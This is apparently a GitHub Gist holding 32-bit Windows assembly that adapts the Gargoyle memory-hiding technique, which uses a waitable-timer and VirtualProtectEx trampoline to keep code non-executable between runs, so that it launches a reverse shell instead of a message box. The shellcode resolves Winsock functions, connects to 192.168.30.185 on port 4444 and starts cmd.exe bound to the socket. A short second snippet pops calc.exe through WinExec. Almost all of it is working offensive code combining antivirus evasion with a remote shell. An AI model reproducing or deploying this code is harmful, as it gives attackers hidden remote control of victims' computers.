Last active
May 18, 2018 09:56
-
-
Save adon90/5b505fc1f1c504086504b958cc8685f6 to your computer and use it in GitHub Desktop.
Gargoyle setup.nasm to execute a reverse shell instead of messagebox
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
BITS 32 | |
STRUC Configuration | |
.initialized: RESD 1 | |
.setup_addr: RESD 1 | |
.setup_length: RESD 1 | |
.VirtualProtectEx: RESD 1 | |
.WaitForSingleObjectEx: RESD 1 | |
.CreateWaitableTimer: RESD 1 | |
.SetWaitableTimer: RESD 1 | |
.MessageBox: RESD 1 | |
.trampoline_addr: RESD 1 | |
.sleep_handle: RESD 1 | |
.interval: RESD 1 | |
.gadget: RESD 1 | |
.shadow: RESD 2 | |
.stack: RESB 0x10000 | |
.trampoline: RESD 9 | |
ENDSTRUC | |
; Call me like void (*__cdecl callable)(void* workspace); | |
mov ebx, [esp+4] ; Configuration in ebx now | |
lea esp, [ebx + Configuration.trampoline - 4] ; Bottom of "stack" | |
mov ebp, esp | |
; If we're initialized, skip to trampoline fixup | |
mov edx, [ebx + Configuration.initialized] | |
cmp edx, 0 | |
jne reset_trampoline | |
; Create the timer | |
push 0 | |
push 0 | |
push 0 | |
mov ecx, [ebx + Configuration.CreateWaitableTimer] | |
call ecx | |
mov [ebx + Configuration.sleep_handle], eax | |
; Set the timer | |
push 0 | |
mov ecx, [ebx + Configuration.trampoline_addr] | |
push ecx | |
mov ecx, [ebx + Configuration.gadget] | |
push ecx | |
mov ecx, [ebx + Configuration.interval] | |
push ecx | |
lea ecx, [ebx + Configuration.shadow] | |
push ecx | |
mov ecx, [ebx + Configuration.sleep_handle] | |
push ecx | |
mov ecx, [ebx + Configuration.SetWaitableTimer] | |
call ecx | |
; Set the initialized bit | |
mov [ebx + Configuration.initialized], dword 1 | |
; Replace the return address on our trampoline | |
reset_trampoline: | |
mov ecx, [ebx + Configuration.VirtualProtectEx] | |
mov [ebx + Configuration.trampoline], ecx | |
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; | |
;;;; Arbitrary code goes here. Note that the | |
;;;; default stack is pretty small (65k). | |
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; | |
; Pop a MessageBox as example | |
global _start | |
section .text | |
_start: | |
; Get the windows socket dll name | |
xor eax, eax | |
mov ax, 0x3233 ; '\0\023' | |
push eax | |
push dword 0x5f327377 ; '_2sw' | |
push esp | |
; LoadLibrary | |
mov ebx, 0x75fb8530 ; LoadLibraryA(libraryname) | |
call ebx | |
mov ebp, eax ; winsocket dll handle is saved into ebp | |
; Get the funtion name: WSAStartUp | |
xor eax, eax | |
mov ax, 0x7075 ; '\0\0up' | |
push eax | |
push 0x74726174 ; 'trat' | |
push 0x53415357 ; 'SASW' | |
push esp | |
push ebp | |
mov ebx, 0x75faa210 ; GetProcAddress(hmodule, functionname) | |
call ebx | |
; CAll WSAStartUp | |
xor ebx, ebx | |
mov bx, 0x0190 | |
sub esp, ebx | |
push esp | |
push ebx | |
call eax ; WSAStartUp(MAKEWORD(2, 2), wsadata_pointer) | |
; Get the function name: WSASocketA | |
xor eax, eax | |
mov ax, 0x4174 ; '\0\0At' | |
push eax | |
push 0x656b636f ; 'ekco' | |
push 0x53415357 ; 'SASW' | |
push esp | |
push ebp | |
mov ebx, 0x75faa210 ; GetProcAddress(hmodule, functionname) | |
call ebx | |
; Call WSASocket | |
xor ebx, ebx | |
push ebx | |
push ebx | |
push ebx | |
xor ecx, ecx | |
mov cl, 6 | |
push ecx | |
inc ebx | |
push ebx | |
inc ebx | |
push ebx | |
call eax ; WSASocket(AF_INET = 2, SOCK_STREAM = 1, | |
; IPPROTO_TCP = 6, NULL, | |
; (unsigned int)NULL, (unsigned int)NULL); | |
xchg eax, edi ; Save the socket handle into edi | |
; Get the function name: connect | |
mov ebx, 0x74636565 ; '\0tce' | |
shr ebx, 8 | |
push ebx | |
push 0x6e6e6f63 ; 'nnoc' | |
push esp | |
push ebp | |
mov ebx, 0x75faa210 ; GetProcAddress(hmodule, functionname) | |
call ebx | |
; Call connect | |
push 0xb91ea8c0 ; 0xc0, 0xa8, 0x02, 0x88 = 192.168.30.185 | |
push word 0x5c11 ; 0x115c = port 4444 | |
xor ebx, ebx | |
add bl, 2 | |
push word bx | |
mov edx, esp | |
push byte 16 | |
push edx | |
push edi | |
call eax ; connect(s1, (SOCKADDR*) &hax, sizeof(hax) = 16); | |
; Call CreateProcess with redirected streams | |
mov edx, 0x646d6363 | |
shr edx, 8 | |
push edx | |
mov ecx, esp | |
xor edx, edx | |
sub esp, 16 | |
mov ebx, esp ; PROCESS_INFORMATION | |
push edi | |
push edi | |
push edi | |
push edx | |
push edx | |
xor eax, eax | |
inc eax | |
rol eax, 8 | |
inc eax | |
push eax | |
push edx | |
push edx | |
push edx | |
push edx | |
push edx | |
push edx | |
push edx | |
push edx | |
push edx | |
push edx | |
xor eax, eax | |
add al, 44 | |
push eax | |
mov eax, esp ; STARTUP_INFO | |
push ebx ; PROCESS_INFORMATION | |
push eax ; STARTUP_INFO | |
push edx | |
push edx | |
push edx | |
xor eax, eax | |
inc eax | |
push eax | |
push edx | |
push edx | |
push ecx | |
push edx | |
mov ebx, 0x75fc6c10 ; CreateProcess(NULL, commandLine, NULL, NULL, TRUE, 0, NULL, NULL, &sui, &pi); | |
call ebx | |
end: | |
xor edx, edx | |
;push eax | |
;mov eax, 0x75982acf ; ExitProcess(exitcode) | |
;call eax | |
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; | |
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; | |
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; | |
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; | |
;;;; Time to setup tail calls to go down | |
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; | |
; Setup arguments for WaitForSingleObjectEx x1 | |
push 1 | |
push 0xFFFFFFFF | |
mov ecx, [ebx + Configuration.sleep_handle] | |
push ecx | |
push 0 ; Return address never ret'd | |
; Setup arguments for WaitForSingleObjectEx x2 | |
push 1 | |
push 0xFFFFFFFF | |
mov ecx, [ebx + Configuration.sleep_handle] | |
push ecx | |
; Tail call to WaitForSingleObjectEx | |
mov ecx, [ebx + Configuration.WaitForSingleObjectEx] | |
push ecx | |
; Setup arguments for VirtualProtectEx | |
lea ecx, [ebx + Configuration.shadow] | |
push ecx | |
push 2 ; PAGE_READONLY | |
mov ecx, [ebx + Configuration.setup_length] | |
push ecx | |
mov ecx, [ebx + Configuration.setup_addr] | |
push ecx | |
push dword 0xffffffff | |
; Tail call to WaitForSingleObjectEx | |
mov ecx, [ebx + Configuration.WaitForSingleObjectEx] | |
push ecx | |
; Jump to VirtualProtectEx | |
mov ecx, [ebx + Configuration.VirtualProtectEx] | |
jmp ecx |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
; Hardcoded WinExec to execute calc.exe | |
xor eax,eax | |
push eax | |
push ".exe" | |
push "calc" | |
mov eax,esp | |
push 1 | |
push eax | |
mov ebx, 0x75fef890; Direccion de WinExec | |
call ebx | |
mov esp, ebp | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment